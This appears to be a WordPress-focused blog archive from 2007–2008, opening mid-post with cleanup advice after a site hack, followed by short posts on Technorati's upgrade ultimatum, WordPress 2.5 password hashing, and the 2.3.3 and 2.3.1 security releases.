When it comes to security, there are a lot of possible culprits but in this particular situation, we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize how important it is to upgrade immediately. Is it better to have non-working themes and plugins than an insecure site? I would think not.

However, one has to wonder how upgrading to WordPress 2.5 can fix the problem. Remember that when upgrading you are advised to delete the old files first then upload the new files. If you just upload and overwrite the old files, the new files such as the _new, _old, .pngg, .jpgg, .giff ones will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!

Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but they also make for a hacker’s point of entry.

I believe the most crucial problem here are the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.

Update (April 17): There’s now a WordPress Codex page for this issue.

Update (May 2): Please continue to visit the WordPress Support forum for any new developments on this hack. There are other symptoms popping up, like unwanted plugins activated in the database (see active_plugins and deactivated_plugins under wp_options).

Update (June 10): Check out this very helpful post by Donncha O Caoimh.

Leave a Comment | Tags: , , , , , , ,

Technorati’s Ultimatum: Upgrade WordPress to 2.5 Now or Your Blog Will NOT Be Indexed

April 8, 2008 | 7 Comments

Now this comes as a surprise. Technorati has actually given an ultimatum to vulnerable WordPress blogs, saying that unless they upgrade to the latest, most secure version, 2.5, they will not be indexed.

Blogs that have been compromised by this security vulnerability are typified by having links to spam destinations inserted onto the blog page. These link insertions may be invisible to casual observations; the links are often obscured by style attributes that render them invisible. These links are still seen by crawlers such as Technorati’s, Google’s and Yahoo’s.

Technorati also mentions that blogs hosted on WordPress.com should not have this vulnerability.

I know Filipino bloggers are big fans of Technorati, so here’s yet another reason for you to upgrade to WordPress 2.5. Don’t worry, it’s not scary at all!

Leave a Comment | Tags: , , , , , ,

WordPress 2.5′s New Password Hashing Scheme

March 28, 2008 | 1 Comment

Ryan Boren tells us there’s a new password hashing scheme in WordPress 2.5 (along with a new format for cookie authentication). Why is this important for WordPress users with little knowledge about security?

If you share your users table with other applications or with other WordPress blogs that won’t be upgrading to 2.5 all at once, you’ll probably want to continue using MD5 hashes rather than the new hashes.

Thankfully there’s a WordPress plugin that allows us to continue using MD5 hashes. He strongly recommends us to install and run it once we upgrade to 2.5.

Users that login prior to installation of the plugin will get the new hashes, but after the plugin is active those users will be moved back to MD5 upon their next log in. If you ever want to move to the new hashes, just deactivate the plugin.

Leave a Comment | Tags: , , ,

Update to WordPress 2.3.3 Now!

February 5, 2008 | 1 Comment

Two months after the last upgrade, WordPress 2.3.3 is an urgent security release. It addresses an XML-RPC vulnerability that allows any user to edit any other user’s posts in the same blog, as well as some other bug fixes.

Now if updating seems too much of a chore right now and you only care about keeping your blog secure, get the updated xmlrpc.php file and you’re good to go.

Check out the whole announcement at the official WordPress blog.

Leave a Comment | Tags: , , ,

WordPress 2.3.1

November 22, 2007 | No Comments Yet

The latest stable release of WordPress as of this writing is 2.3.1. Changes from the previous version were mostly security and bug fixes.

Please head on to the official WordPress site to download.

Leave a Comment | Tags: , , ,